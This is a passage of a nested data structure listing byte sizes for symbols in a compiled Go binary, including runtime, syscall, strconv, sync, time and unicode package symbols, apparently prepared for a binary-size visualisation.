188}, 'mSysStatInc': {'value': 182}, 'madvise': {'value': 24}, 'main': {'value': 852}, 'main.': {'children': {'func1': {'value': 71}, 'func2': {'value': 60}}}, 'mainPC': {'value': 8}, 'mainStarted': {'value': 1}, 'main_init_done': {'value': 8}, 'makeBucketArray': {'value': 550}, 'makechan': {'value': 613}, 'makemap': {'value': 498}, 'makemap_small': {'value': 141}, 'makeslice': {'value': 252}, 'malg': {'value': 199}, 'malg.': {'children': {'func1': {'value': 88}}}, 'mallocgc': {'value': 2480}, 
'mallocgc.': {'children': {'func1': {'value': 100}}}, 'mallocinit': {'value': 592}, 'mapaccess1_fast32': {'value': 415}, 'mapaccess1_fast64': {'value': 417}, 'mapaccess2': {'value': 559}, 'mapaccess2_fast32': {'value': 434}, 'mapaccess2_fast64': {'value': 436}, 'mapaccessK': {'value': 531}, 'mapassign': {'value': 1418}, 'mapassign_fast32': {'value': 813}, 'mapassign_fast64ptr': {'value': 850}, 'mapassign_faststr': {'value': 1028}, 'mapiterinit': {'value': 689}, 'mapiternext': {'value': 1329}, 'markBitsForAddr': {'value': 217}, 'markroot': {'value': 879}, 'markroot.': {'children': {'func1': {'value': 234}}}, 'markrootBlock': {'value': 164}, 'markrootFreeGStacks': {'value': 313}, 'markrootSpans': {'value': 572}, 'maxElems': {'value': 264}, 'maxstacksize': {'value': 8}, 'mbuckets': {'value': 8}, 'mcall': {'value': 102}, 'mcommoninit': {'value': 490}, 'memclrHasPointers': {'value': 81}, 'memclrNoHeapPointers': {'value': 641}, 'memequal': {'value': 36}, 'memequal0': {'value': 6}, 'memequal128': {'value': 38}, 'memequal16': {'value': 22}, 'memequal32': {'value': 20}, 'memequal64': {'value': 22}, 'memequal8': {'value': 21}, 'memequal_varlen': {'value': 35}, 'memhash': {'value': 768}, 'memhash0': {'value': 11}, 'memhash128': {'value': 89}, 'memhash16': {'value': 89}, 'memhash32': {'value': 105}, 'memhash64': {'value': 102}, 'memhash8': {'value': 89}, 'memhash_varlen': {'value': 70}, 'memmove': {'value': 1723}, 'memoryError': {'value': 16}, 'memstats': {'value': 5976}, 'mexit': {'value': 572}, 'mheap_': {'value': 13944}, 'mhelpgc': {'value': 24}, 'mincore': {'value': 27}, 'minit': {'value': 76}, 'minitSignalMask': {'value': 249}, 'minitSignalStack': {'value': 350}, 'minitSignals': {'value': 53}, 'mmap': {'value': 367}, 'mmap.': {'children': {'func1': {'value': 118}}}, 'moduledataverify': {'value': 86}, 'moduledataverify1': {'value': 1685}, 'modulesSlice': {'value': 8}, 'modulesinit': {'value': 637}, 'morestack': {'value': 149}, 'morestack_noctxt': {'value': 10}, 
'morestackc': {'value': 41}, 'mpreinit': {'value': 132}, 'mput': {'value': 89}, 'msigrestore': {'value': 55}, 'msigsave': {'value': 63}, 'mspinning': {'value': 21}, 'mstart': {'value': 140}, 'mstart1': {'value': 303}, 'mstartm0': {'value': 93}, 'munmap': {'value': 160}, 'munmap.': {'children': {'func1': {'value': 68}}}, 'mutexprofilerate': {'value': 8}, 'name.': {'children': {'name': {'value': 73}, 'pkgPath': {'value': 239}, 'tag': {'value': 142}, 'tagLen': {'value': 79}}}, 'nanotime': {'value': 190}, 'ncpu': {'value': 4}, 'needaddgcproc': {'value': 150}, 'needm': {'value': 324}, 'netpoll': {'value': 545}, 'netpollInited': {'value': 4}, 'netpollWaiters': {'value': 4}, 'netpollblock': {'value': 338}, 'netpollblockcommit': {'value': 75}, 'netpollclose': {'value': 115}, 'netpollgoready': {'value': 89}, 'netpollinit': {'value': 212}, 'netpollopen': {'value': 143}, 'netpollready': {'value': 260}, 'netpollunblock': {'value': 152}, 'newAllocBits': {'value': 70}, 'newArenaMayUnlock': {'value': 230}, 'newBucket': {'value': 207}, 'newMarkBits': {'value': 756}, 'newarray': {'value': 236}, 'newdefer': {'value': 511}, 'newdefer.': {'children': {'func1': {'value': 452}, 'func2': {'value': 320}}}, 'newextram': {'value': 140}, 'newm': {'value': 325}, 'newm1': {'value': 317}, 'newmHandoff': {'value': 40}, 'newobject': {'value': 83}, 'newosproc': {'value': 460}, 'newproc': {'value': 120}, 'newproc.': {'children': {'func1': {'value': 96}}}, 'newproc1': {'value': 1308}, 'newprocs': {'value': 4}, 'newstack': {'value': 3422}, 'nextMarkBitArenaEpoch': {'value': 190}, 'nextSample': {'value': 70}, 'nilinterequal': {'value': 107}, 'nilinterhash': {'value': 380}, 'noSignalStack': {'value': 139}, 'no_pointers_stackmap': {'value': 8}, 'notesleep': {'value': 244}, 'notetsleep': {'value': 140}, 'notetsleep_internal': {'value': 426}, 'notetsleepg': {'value': 149}, 'notewakeup': {'value': 192}, 'oneBitCount': {'value': 256}, 'oneNewExtraM': {'value': 479}, 'oneptrmask': {'value': 1}, 'open': 
{'value': 44}, 'osinit': {'value': 60}, 'osyield': {'value': 8}, 'overflowError': {'value': 16}, 'panicCheckMalloc': {'value': 165}, 'panicdivide': {'value': 103}, 'panicdottypeE': {'value': 226}, 'panicdottypeI': {'value': 256}, 'panicfloat': {'value': 103}, 'panicindex': {'value': 297}, 'panicking': {'value': 4}, 'paniclk': {'value': 8}, 'panicmem': {'value': 103}, 'panicoverflow': {'value': 103}, 'panicslice': {'value': 297}, 'panicwrap': {'value': 1023}, 'park_m': {'value': 487}, 'parkunlock_c': {'value': 65}, 'parsedebugvars': {'value': 856}, 'pcdatavalue': {'value': 161}, 'pclntab': {'value': 445833}, 'pcvalue': {'value': 1412}, 'persistentalloc': {'value': 160}, 'persistentalloc.': {'children': {'func1': {'value': 99}}}, 'persistentalloc1': {'value': 733}, 'physPageSize': {'value': 8}, 'pidleput': {'value': 148}, 'pinnedTypemaps': {'value': 24}, 'plainError.': {'children': {'Error': {'value': 21}}}, 'pollFractionalWorkerExit': {'value': 181}, 'pollWork': {'value': 213}, 'pollcache': {'value': 16}, 'poolcleanup': {'value': 8}, 'preemptall': {'value': 122}, 'prepareFreeWorkbufs': {'value': 161}, 'preprintpanics': {'value': 500}, 'preprintpanics.': {'children': {'func1': {'value': 95}}}, 'printAncestorTraceback': {'value': 539}, 'printAncestorTracebackFuncInfo': {'value': 1396}, 'printBacklog': {'value': 512}, 'printBacklogIndex': {'value': 8}, 'printCgoTraceback': {'value': 304}, 'printOneCgoTraceback': {'value': 498}, 'printany': {'value': 2024}, 'printbool': {'value': 107}, 'printcomplex': {'value': 141}, 'printcreatedby': {'value': 196}, 'printcreatedby1': {'value': 443}, 'printeface': {'value': 166}, 'printfloat': {'value': 669}, 'printhex': {'value': 256}, 'printint': {'value': 100}, 'printlock': {'value': 120}, 'printnl': {'value': 71}, 'printpanics': {'value': 248}, 'printpointer': {'value': 60}, 'printslice': {'value': 200}, 'printsp': {'value': 71}, 'printstring': {'value': 140}, 'printuint': {'value': 252}, 'printunlock': {'value': 98}, 'procAuxv': 
{'value': 24}, 'processorVersionInfo': {'value': 4}, 'procresize': {'value': 2682}, 'procyield': {'value': 12}, 'prof': {'value': 8}, 'profilealloc': {'value': 92}, 'proflock': {'value': 8}, 'progToPointerMask': {'value': 294}, 'publicationBarrier': {'value': 1}, 'publicationBarrier.': {'children': {'args_stackmap': {'value': 8}}}, 'purgecachedstats': {'value': 173}, 'putempty': {'value': 88}, 'putfull': {'value': 88}, 'queuefinalizer': {'value': 568}, 'raise': {'value': 21}, 'raisebadsignal': {'value': 309}, 'raiseproc': {'value': 21}, 'rawbyteslice': {'value': 364}, 'rawruneslice': {'value': 428}, 'rawstring': {'value': 134}, 'rawstringtmp': {'value': 165}, 'read': {'value': 38}, 'readgogc': {'value': 175}, 'readvarint': {'value': 92}, 'ready': {'value': 646}, 'readyWithTime': {'value': 103}, 'recordForPanic': {'value': 329}, 'recordspan': {'value': 512}, 'recovery': {'value': 329}, 'recv': {'value': 434}, 'recvDirect': {'value': 137}, 'reentersyscall': {'value': 562}, 'reentersyscall.': {'children': {'func1': {'value': 252}}}, 'reflectOffs': {'value': 32}, 'reflectOffsLock': {'value': 62}, 'reflectOffsUnlock': {'value': 62}, 'reflectcall': {'value': 475}, 'reflectcall.': {'children': {'args_stackmap': {'value': 9}}}, 'reflectcallmove': {'value': 152}, 'releaseSudog': {'value': 924}, 'releasep': {'value': 550}, 'removefinalizer': {'value': 181}, 'removespecial': {'value': 422}, 'resetspinning': {'value': 182}, 'resolveNameOff': {'value': 736}, 'resolveTypeOff': {'value': 824}, 'restartg': {'value': 467}, 'retake': {'value': 596}, 'return0': {'value': 6}, 'round2': {'value': 35}, 'rt0_go': {'value': 318}, 'rt_sigaction': {'value': 32}, 'rtsigprocmask': {'value': 46}, 'runGCProg': {'value': 1603}, 'runSafePointFn': {'value': 193}, 'runfinq': {'value': 1034}, 'runningPanicDefers': {'value': 4}, 'runqempty': {'value': 53}, 'runqget': {'value': 168}, 'runqgrab': {'value': 335}, 'runqput': {'value': 251}, 'runqputslow': {'value': 541}, 'runqsteal': {'value': 235}, 
'runtimeInitTime': {'value': 8}, 'save': {'value': 65}, 'saveAncestors': {'value': 867}, 'saveblockevent': {'value': 438}, 'scanblock': {'value': 302}, 'scanframeworker': {'value': 226}, 'scang': {'value': 953}, 'scanobject': {'value': 952}, 'scanstack': {'value': 1181}, 'scanstack.': {'children': {'func1': {'value': 83}}}, 'scavengeTreapNode': {'value': 294}, 'scavengelist': {'value': 332}, 'scavengetreap': {'value': 230}, 'sched': {'value': 296}, 'sched_getaffinity': {'value': 27}, 'schedinit': {'value': 566}, 'schedtrace': {'value': 2831}, 'schedule': {'value': 860}, 'semacquire': {'value': 74}, 'semacquire1': {'value': 704}, 'semrelease': {'value': 65}, 'semrelease1': {'value': 456}, 'semtable': {'value': 16064}, 'send': {'value': 283}, 'sendDirect': {'value': 137}, 'setThreadCPUProfiler': {'value': 218}, 'setg': {'value': 15}, 'setitimer': {'value': 22}, 'setprofilebucket': {'value': 185}, 'setsSP': {'value': 126}, 'setsig': {'value': 314}, 'setsigstack': {'value': 130}, 'settls': {'value': 66}, 'shade': {'value': 202}, 'shouldPushSigpanic': {'value': 175}, 'showframe': {'value': 175}, 'showfuncinfo': {'value': 555}, 'shrinkstack': {'value': 375}, 'siftdownTimer': {'value': 464}, 'siftupTimer': {'value': 274}, 'sig': {'value': 72}, 'sigNotOnStack': {'value': 139}, 'sigaction': {'value': 350}, 'sigaction.': {'children': {'func1': {'value': 99}}}, 'sigaltstack': {'value': 39}, 'sigblock': {'value': 57}, 'sigfwd': {'value': 34}, 'sigfwdgo': {'value': 441}, 'sighandler': {'value': 1899}, 'signalDuringFork': {'value': 139}, 'signalsOK': {'value': 1}, 'signalstack': {'value': 96}, 'sigpanic': {'value': 766}, 'sigpipe': {'value': 90}, 'sigprocmask': {'value': 64}, 'sigprof': {'value': 1420}, 'sigprofCallers': {'value': 256}, 'sigprofCallersUse': {'value': 4}, 'sigprofNonGo': {'value': 135}, 'sigprofNonGoPC': {'value': 145}, 'sigreturn': {'value': 11}, 'sigsend': {'value': 397}, 'sigset_all': {'value': 8}, 'sigtable': {'value': 1560}, 'sigtramp': {'value': 107}, 
'sigtrampgo': {'value': 1214}, 'size_to_class128': {'value': 249}, 'size_to_class8': {'value': 129}, 'sizeof_C_MStats': {'value': 8}, 'skipPC': {'value': 8}, 'skipPleaseUseCallersFrames': {'value': 256}, 'sliceError': {'value': 16}, 'slicebytetostring': {'value': 228}, 'slicerunetostring': {'value': 500}, 'spanOfHeap': {'value': 129}, 'stackLarge': {'value': 568}, 'stackalloc': {'value': 794}, 'stackcache_clear': {'value': 215}, 'stackcacherefill': {'value': 235}, 'stackcacherelease': {'value': 285}, 'stackcheck': {'value': 31}, 'stackfree': {'value': 796}, 'stackinit': {'value': 91}, 'stacklog2': {'value': 27}, 'stackpool': {'value': 64}, 'stackpoolalloc': {'value': 469}, 'stackpoolfree': {'value': 391}, 'stackpoolmu': {'value': 8}, 'startNano': {'value': 8}, 'startTemplateThread': {'value': 106}, 'startTheWorld': {'value': 141}, 'startTheWorld.': {'children': {'func1': {'value': 55}}}, 'startTheWorldWithSema': {'value': 599}, 'startlockedm': {'value': 214}, 'startm': {'value': 546}, 'startpanic_m': {'value': 460}, 'starttime': {'value': 8}, 'startupRandomData': {'value': 24}, 'staticbytes': {'value': 256}, 'statictmp_1': {'value': 16}, 'statictmp_10': {'value': 16}, 'statictmp_11': {'value': 16}, 'statictmp_12': {'value': 16}, 'statictmp_15': {'value': 16}, 'statictmp_16': {'value': 16}, 'statictmp_17': {'value': 8}, 'statictmp_19': {'value': 8}, 'statictmp_2': {'value': 16}, 'statictmp_20': {'value': 16}, 'statictmp_25': {'value': 16}, 'statictmp_28': {'value': 16}, 'statictmp_29': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_32': {'value': 16}, 'statictmp_33': {'value': 16}, 'statictmp_35': {'value': 64}, 'statictmp_36': {'value': 64}, 'statictmp_37': {'value': 64}, 'statictmp_38': {'value': 64}, 'statictmp_39': {'value': 64}, 'statictmp_4': {'value': 16}, 'statictmp_40': {'value': 64}, 'statictmp_43': {'value': 16}, 'statictmp_47': {'value': 8}, 'statictmp_5': {'value': 16}, 'statictmp_50': {'value': 64}, 'statictmp_51': {'value': 64}, 
'statictmp_52': {'value': 16}, 'statictmp_53': {'value': 16}, 'statictmp_54': {'value': 16}, 'statictmp_55': {'value': 16}, 'statictmp_56': {'value': 16}, 'statictmp_57': {'value': 16}, 'statictmp_58': {'value': 360}, 'statictmp_7': {'value': 96}, 'statictmp_8': {'value': 96}, 'statictmp_9': {'value': 144}, 'stealOrder': {'value': 32}, 'step': {'value': 425}, 'stkbucket': {'value': 834}, 'stopTheWorld': {'value': 146}, 'stopTheWorldWithSema': {'value': 708}, 'stoplockedm': {'value': 691}, 'stopm': {'value': 410}, 'strequal': {'value': 107}, 'strhash': {'value': 92}, 'stringtoslicebyte': {'value': 220}, 'stringtoslicerune': {'value': 403}, 'support_erms': {'value': 1}, 'support_popcnt': {'value': 1}, 'support_sse2': {'value': 1}, 'support_sse41': {'value': 1}, 'sweep': {'value': 32}, 'sweepone': {'value': 918}, 'syncadjustsudogs': {'value': 334}, 'sysAlloc': {'value': 272}, 'sysFault': {'value': 95}, 'sysFree': {'value': 72}, 'sysMap': {'value': 211}, 'sysMmap': {'value': 80}, 'sysMunmap': {'value': 39}, 'sysReserve': {'value': 135}, 'sysReserveAligned': {'value': 309}, 'sysSigaction': {'value': 110}, 'sysSigaction.': {'children': {'func1': {'value': 63}}}, 'sysUnused': {'value': 379}, 'sysUsed': {'value': 114}, 'sysargs': {'value': 629}, 'sysauxv': {'value': 272}, 'sysmon': {'value': 1258}, 'systemstack': {'value': 163}, 'systemstack_switch': {'value': 1}, 'templateThread': {'value': 277}, 'testAtomic64': {'value': 604}, 'testSigtrap': {'value': 8}, 'test_x64': {'value': 8}, 'test_z64': {'value': 8}, 'testdefersizes': {'value': 585}, 'textsectionmap': {'value': 24}, 'throw': {'value': 133}, 'throw.': {'children': {'func1': {'value': 128}}}, 'throwinit': {'value': 63}, 'timediv': {'value': 101}, 'timejump': {'value': 205}, 'timejumpLocked': {'value': 159}, 'timers': {'value': 8192}, 'trace': {'value': 65744}, 'traceAcquireBuffer': {'value': 174}, 'traceEvent': {'value': 247}, 'traceEventLocked': {'value': 674}, 'traceFlush': {'value': 473}, 'traceGCDone': {'value': 
81}, 'traceGCMarkAssistDone': {'value': 81}, 'traceGCMarkAssistStart': {'value': 81}, 'traceGCSTWDone': {'value': 81}, 'traceGCSTWStart': {'value': 111}, 'traceGCStart': {'value': 120}, 'traceGCSweepDone': {'value': 221}, 'traceGCSweepSpan': {'value': 163}, 'traceGCSweepStart': {'value': 124}, 'traceGoCreate': {'value': 247}, 'traceGoEnd': {'value': 81}, 'traceGoPark': {'value': 139}, 'traceGoPreempt': {'value': 108}, 'traceGoSched': {'value': 108}, 'traceGoStart': {'value': 410}, 'traceGoSysBlock': {'value': 219}, 'traceGoSysCall': {'value': 81}, 'traceGoSysExit': {'value': 218}, 'traceGoUnpark': {'value': 253}, 'traceGomaxprocs': {'value': 113}, 'traceHeapAlloc': {'value': 113}, 'traceNextGC': {'value': 190}, 'traceProcFree': {'value': 181}, 'traceProcStart': {'value': 126}, 'traceProcStop': {'value': 219}, 'traceReader': {'value': 238}, 'traceReleaseBuffer': {'value': 128}, 'traceStackID': {'value': 325}, 'tracealloc': {'value': 635}, 'tracealloc.': {'children': {'func1': {'value': 86}}}, 'traceback': {'value': 99}, 'traceback1': {'value': 852}, 'tracebackCgoContext': {'value': 605}, 'tracebackHexdump': {'value': 490}, 'tracebackHexdump.': {'children': {'func1': {'value': 60}}}, 'traceback_cache': {'value': 4}, 'traceback_env': {'value': 4}, 'tracebackdefers': {'value': 551}, 'tracebackothers': {'value': 598}, 'tracebacktrap': {'value': 183}, 'tracefree': {'value': 337}, 'tracefree.': {'children': {'func1': {'value': 86}}}, 'tracegc': {'value': 225}, 'tracelock': {'value': 8}, 'trygetfull': {'value': 111}, 'typeBitsBulkBarrier': {'value': 727}, 'typedmemclr': {'value': 98}, 'typedmemmove': {'value': 196}, 'typedslicecopy': {'value': 320}, 'typelink': {'value': 2920}, 'typelinksinit': {'value': 1743}, 'typesEqual': {'value': 4025}, 'typestring': {'value': 80}, 'unblocksig': {'value': 119}, 'unlock': {'value': 200}, 'unlockOSThread': {'value': 140}, 'unminit': {'value': 6}, 'unminitSignals': {'value': 153}, 'urandom_dev': {'value': 24}, 'useAVXmemmove': {'value': 
1}, 'useAeshash': {'value': 1}, 'useCheckmark': {'value': 1}, 'usleep': {'value': 71}, 'vdsoClockgettimeSym': {'value': 8}, 'vdsoFindVersion': {'value': 279}, 'vdsoGettimeofdaySym': {'value': 8}, 'vdsoInitFromSysinfoEhdr': {'value': 1120}, 'vdsoLinuxVersion': {'value': 24}, 'vdsoParseSymbols': {'value': 951}, 'vdsoParseSymbols.': {'children': {'func1': {'value': 329}}}, 'vdsoSymbolKeys': {'value': 24}, 'vdsoauxv': {'value': 214}, 'waitReason.': {'children': {'String': {'value': 107}}}, 'waitReasonStrings': {'value': 384}, 'wakefing': {'value': 149}, 'wakep': {'value': 99}, 'walltime': {'value': 178}, 'wbBufFlush': {'value': 216}, 'wbBufFlush.': {'children': {'func1': {'value': 75}}}, 'wbBufFlush1': {'value': 640}, 'work': {'value': 424}, 'worldsema': {'value': 4}, 'write': {'value': 39}, 'writeBarrier': {'value': 16}, 'writeErr': {'value': 90}, 'xbuckets': {'value': 8}, 'zeroVal': {'value': 1024}, 'zerobase': {'value': 8}}}, 'syscall.': {'children': {'go.itab.Errno,error': {'value': 32}, '(*Errno).': {'children': {'Error': {'value': 119}}}, 'BytePtrFromString': {'value': 161}, 'ByteSliceFromString': {'value': 287}, 'Close': {'value': 209}, 'Errno.': {'children': {'Error': {'value': 206}}}, 'Readlink': {'value': 151}, 'SetNonblock': {'value': 201}, 'Stderr': {'value': 8}, 'Stdin': {'value': 8}, 'Stdout': {'value': 8}, 'Syscall': {'value': 113}, 'Syscall.': {'children': {'args_stackmap': {'value': 12}}}, 'Syscall6': {'value': 107}, 'Syscall6.': {'children': {'args_stackmap': {'value': 14}}}, 'Write': {'value': 120}, '_zero': {'value': 8}, 'envs': {'value': 24}, 'errEAGAIN': {'value': 16}, 'errEINVAL': {'value': 16}, 'errENOENT': {'value': 16}, 'errors': {'value': 2128}, 'fcntl': {'value': 245}, 'init': {'value': 212}, 'initdone.': {'value': 1}, 'itoa': {'value': 188}, 'mmap': {'value': 293}, 'munmap': {'value': 220}, 'readlinkat': {'value': 432}, 'runtime_envs': {'value': 269}, 'statictmp_24': {'value': 8}, 'statictmp_50': {'value': 8}, 'statictmp_51': {'value': 8}, 
'statictmp_52': {'value': 8}, 'statictmp_53': {'value': 32}, 'uitoa': {'value': 239}, 'write': {'value': 277}}}, 'io.': {'children': {'EOF': {'value': 16}, 'ErrClosedPipe': {'value': 16}, 'ErrNoProgress': {'value': 16}, 'ErrShortBuffer': {'value': 16}, 'ErrShortWrite': {'value': 16}, 'ErrUnexpectedEOF': {'value': 16}, 'errOffset': {'value': 16}, 'errWhence': {'value': 16}, 'init': {'value': 738}, 'initdone.': {'value': 1}}}, 'main.': {'children': {'init': {'value': 92}, 'initdone.': {'value': 1}, 'main': {'value': 170}, 'statictmp_0': {'value': 16}, 'x': {'value': 80000}}}, 'math.': {'children': {'init': {'value': 116}, 'initdone.': {'value': 1}, 'useFMA': {'value': 1}}}, 'runtime/': {'children': {'debug.': {'children': {'SetTraceback': {'value': 443}, 'setGCPercent': {'value': 203}}}, 'internal/': {'children': {'atomic.': {'children': {'Cas64': {'value': 26}, 'Casuintptr': {'value': 5}, 'Store': {'value': 12}, 'Store64': {'value': 14}, 'Storeuintptr': {'value': 5}}}, 'sys.': {'children': {'DefaultGoroot': {'value': 16}, 'DefaultGoroot.': {'children': {'str': {'value': 17}}}, 'ntz8tab': {'value': 256}}}}}}}, 'strconv.': {'children': {'(*decimal).': {'children': {'Assign': {'value': 246}, 'Round': {'value': 200}, 'RoundDown': {'value': 99}, 'RoundUp': {'value': 139}, 'Shift': {'value': 203}, 'String': {'value': 1103}}}, '(*extFloat).': {'children': {'AssignComputeBounds': {'value': 272}, 'FixedDecimal': {'value': 946}, 'Multiply': {'value': 123}, 'ShortestDecimal': {'value': 1328}, 'frexp10': {'value': 269}}}, 'AppendFloat': {'value': 176}, 'AppendQuote': {'value': 158}, 'AppendQuoteRune': {'value': 133}, 'AppendQuoteRuneToASCII': {'value': 133}, 'AppendQuoteToASCII': {'value': 158}, 'CanBackquote': {'value': 252}, 'ErrRange': {'value': 16}, 'ErrSyntax': {'value': 16}, 'FormatInt': {'value': 281}, 'IsPrint': {'value': 809}, 'Itoa': {'value': 89}, 'adjustLastDigit': {'value': 242}, 'adjustLastDigitFixed': {'value': 354}, 'appendEscapedRune': {'value': 3172}, 
'appendQuotedRuneWith': {'value': 370}, 'appendQuotedWith': {'value': 1071}, 'bigFtoa': {'value': 1013}, 'bsearch16': {'value': 124}, 'bsearch32': {'value': 121}, 'digitZero': {'value': 32}, 'float32info': {'value': 24}, 'float64info': {'value': 24}, 'fmtB': {'value': 570}, 'fmtE': {'value': 1745}, 'fmtF': {'value': 1071}, 'formatBits': {'value': 1326}, 'formatDigits': {'value': 1043}, 'frexp10Many': {'value': 239}, 'genericFtoa': {'value': 2227}, 'init': {'value': 252}, 'initdone.': {'value': 1}, 'isGraphic': {'value': 24}, 'isInGraphicList': {'value': 179}, 'isNotPrint16': {'value': 24}, 'isNotPrint32': {'value': 24}, 'isPrint16': {'value': 24}, 'isPrint32': {'value': 24}, 'leftShift': {'value': 564}, 'leftcheats': {'value': 24}, 'optimize': {'value': 1}, 'powersOfTen': {'value': 2088}, 'prefixIsLessThan': {'value': 69}, 'rightShift': {'value': 445}, 'roundShortest': {'value': 933}, 'statictmp_1': {'value': 16}, 'statictmp_10': {'value': 1464}, 'statictmp_11': {'value': 912}, 'statictmp_12': {'value': 280}, 'statictmp_13': {'value': 1584}, 'statictmp_14': {'value': 172}, 'statictmp_15': {'value': 32}, 'statictmp_2': {'value': 16}, 'statictmp_3': {'value': 16}, 'statictmp_4': {'value': 16}, 'statictmp_5': {'value': 16}, 'statictmp_6': {'value': 16}, 'trim': {'value': 93}, 'uint64pow10': {'value': 160}}}, 'sync.': {'children': {'(*Map).': {'children': {'Load': {'value': 774}, 'LoadOrStore': {'value': 1498}, 'Store': {'value': 1325}, 'dirtyLocked': {'value': 557}, 'missLocked': {'value': 249}}}, '(*Mutex).': {'children': {'Lock': {'value': 715}, 'Unlock': {'value': 217}}}, '(*Once).': {'children': {'Do': {'value': 239}}}, '(*Pool).': {'children': {'Get': {'value': 352}, 'Put': {'value': 420}, 'getSlow': {'value': 313}, 'pin': {'value': 113}, 'pinSlow': {'value': 568}}}, '(*entry).': {'children': {'storeLocked': {'value': 72}, 'tryExpungeLocked': {'value': 148}, 'tryLoadOrStore': {'value': 402}, 'tryStore': {'value': 170}, 'unexpungeLocked': {'value': 92}}}, 
'allPools': {'value': 24}, 'allPoolsMu': {'value': 8}, 'event': {'value': 212}, 'expunged': {'value': 8}, 'init': {'value': 163}, 'init.': {'children': {'0': {'value': 62}, '1': {'value': 59}}}, 'initdone.': {'value': 1}, 'poolCleanup': {'value': 552}, 'runtime_SemacquireMutex': {'value': 78}, 'runtime_Semrelease': {'value': 69}, 'runtime_canSpin': {'value': 140}, 'runtime_doSpin': {'value': 36}, 'runtime_nanotime': {'value': 60}, 'runtime_notifyListCheck': {'value': 183}, 'runtime_procPin': {'value': 36}, 'runtime_procUnpin': {'value': 21}, 'runtime_registerPoolCleanup': {'value': 83}, 'throw': {'value': 62}}}, 'sync/': {'children': {'atomic.': {'children': {'(*Value).': {'children': {'Store': {'value': 310}}}, 'CompareAndSwapPointer': {'value': 115}, 'CompareAndSwapUintptr': {'value': 5}, 'CompareAndSwapUintptr.': {'children': {'args_stackmap': {'value': 10}}}, 'StorePointer': {'value': 91}, 'StoreUint32': {'value': 5}, 'StoreUint32.': {'children': {'args_stackmap': {'value': 9}}}, 'StoreUintptr': {'value': 5}, 'StoreUintptr.': {'children': {'args_stackmap': {'value': 9}}}, 'runtime_procPin': {'value': 36}, 'runtime_procUnpin': {'value': 21}, 'statictmp_1': {'value': 16}, 'statictmp_2': {'value': 16}}}}}, 'time.': {'children': {'atoiError': {'value': 16}, 'badData': {'value': 16}, 'errBad': {'value': 16}, 'errLeadingInt': {'value': 16}, 'errLocation': {'value': 16}, 'init': {'value': 1158}, 'initdone.': {'value': 1}, 'now': {'value': 107}, 'statictmp_19': {'value': 64}, 'unitMap': {'value': 8}}}, 'unicode.': {'children': {'ASCII_Hex_Digit': {'value': 8}, 'Adlam': {'value': 8}, 'Ahom': {'value': 8}, 'Anatolian_Hieroglyphs': {'value': 8}, 'Arabic': {'value': 8}, 'Armenian': {'value': 8}, 'Avestan': {'value': 8}, 'Balinese': {'value': 8}, 'Bamum': {'value': 8}, 'Bassa_Vah': {'value': 8}, 'Batak': {'value': 8}, 'Bengali': {'value': 8}, 'Bhaiksuki': {'value': 8}, 'Bidi_Control': {'value': 8}, 'Bopomofo': {'value': 8}, 'Brahmi': {'value': 8}, 'Braille': {'value': 8}, 
'Buginese': {'value': 8}, 'Buhid': {'value': 8}, 'C': {'value': 8}, 'Canadian_Aboriginal': {'value': 8}, 'Carian': {'value': 8}, 'Categories': {'value': 8}, 'Caucasian_Albanian': {'value': 8}, 'Cc': {'value': 8}, 'Cf': {'value': 8}, 'Chakma': {'value': 8}, 'Cham': {'value': 8}, 'Cherokee': {'value': 8}, 'Co': {'value': 8}, 'Common': {'value': 8}, 'Coptic': {'value': 8}, 'Cs': {'value': 8}, 'Cuneiform': {'value': 8}, 'Cypriot': {'value': 8}, 'Cyrillic': {'value': 8}, 'Dash': {'value': 8}, 'Deprecated': {'value': 8}, 'Deseret': {'value': 8}, 'Devanagari': {'value': 8}, 'Diacritic': {'value': 8}, 'Duployan': {'value': 8}, 'Egyptian_Hieroglyphs': {'value': 8}, 'Elbasan': {'value': 8}, 'Ethiopic': {'value': 8}, 'Extender': {'value': 8}, 'FoldCategory': {'value': 8}, 'FoldScript': {'value': 8}, 'Georgian': {'value': 8}, 'Glagolitic': {'value': 8}, 'Gothic': {'value': 8}, 'Grantha': {'value': 8}, 'Greek': {'value': 8}, 'Gujarati': {'value': 8}, 'Gurmukhi': {'value': 8}, 'Han': {'value': 8}, 'Hangul': {'value': 8}, 'Hanunoo': {'value': 8}, 'Hatran': {'value': 8}, 'Hebrew': {'value': 8}, 'Hex_Digit': {'value': 8}, 'Hiragana': {'value': 8}, 'Hyphen': {'value': 8}, 'IDS_Binary_Operator': {'value': 8}, 'IDS_Trinary_Operator': {'value': 8}, 'Ideographic': {'value': 8}, 'Imperial_Aramaic': {'value': 8}, 'Inherited': {'value': 8}, 'Inscriptional_Pahlavi': {'value': 8}, 'Inscriptional_Parthian': {'value': 8}, 'Javanese': {'value': 8}, 'Join_Control': {'value': 8}, 'Kaithi': {'value': 8}, 'Kannada': {'value': 8}, 'Katakana': {'value': 8}, 'Kayah_Li': {'value': 8}, 'Kharoshthi': {'value': 8}, 'Khmer': {'value': 8}, 'Khojki': {'value': 8}, 'Khudawadi': {'value': 8}, 'L': {'value': 8}, 'Lao': {'value': 8}, 'Latin': {'value': 8}, 'Lepcha': {'value': 8}, 'Limbu': {'value': 8}, 'Linear_A': {'value': 8}, 'Linear_B': {'value': 8}, 'Lisu': {'value': 8}, 'Ll': {'value': 8}, 'Lm': {'value': 8}, 'Lo': {'value': 8}, 'Logical_Order_Exception': {'value': 8}, 'Lt': {'value': 8}, 'Lu': {'value': 
8}, 'Lycian': {'value': 8}, 'Lydian': {'value': 8}, 'M': {'value': 8}, 'Mahajani': {'value': 8}, 'Malayalam': {'value': 8}, 'Mandaic': {'value': 8}, 'Manichaean': {'value': 8}, 'Marchen': {'value': 8}, 'Masaram_Gondi': {'value': 8}, 'Mc': {'value': 8}, 'Me': {'value': 8}, 'Meetei_Mayek': {'value': 8}, 'Mende_Kikakui': {'value': 8}, 'Meroitic_Cursive': {'value': 8}, 'Meroitic_Hieroglyphs': {'value': 8}, 'Miao': {'value': 8}, 'Mn': {'value': 8}, 'Modi': {'value': 8}, 'Mongolian': {'value': 8}, 'Mro': {'value': 8}, 'Multani': {'value': 8}, 'Myanmar': {'value': 8}, 'N': {'value': 8}, 'Nabataean': {'value': 8}, 'Nd': {'value': 8}, 'New_Tai_Lue': {'value': 8}, 'Newa': {'value': 8}, 'Nko': {'value': 8}, 'Nl': {'value': 8}, 'No': {'value': 8}, 'Noncharacter_Code_Point': {'value': 8}, 'Nushu': {'value': 8}, 'Ogham': {'value': 8}, 'Ol_Chiki': {'value': 8}, 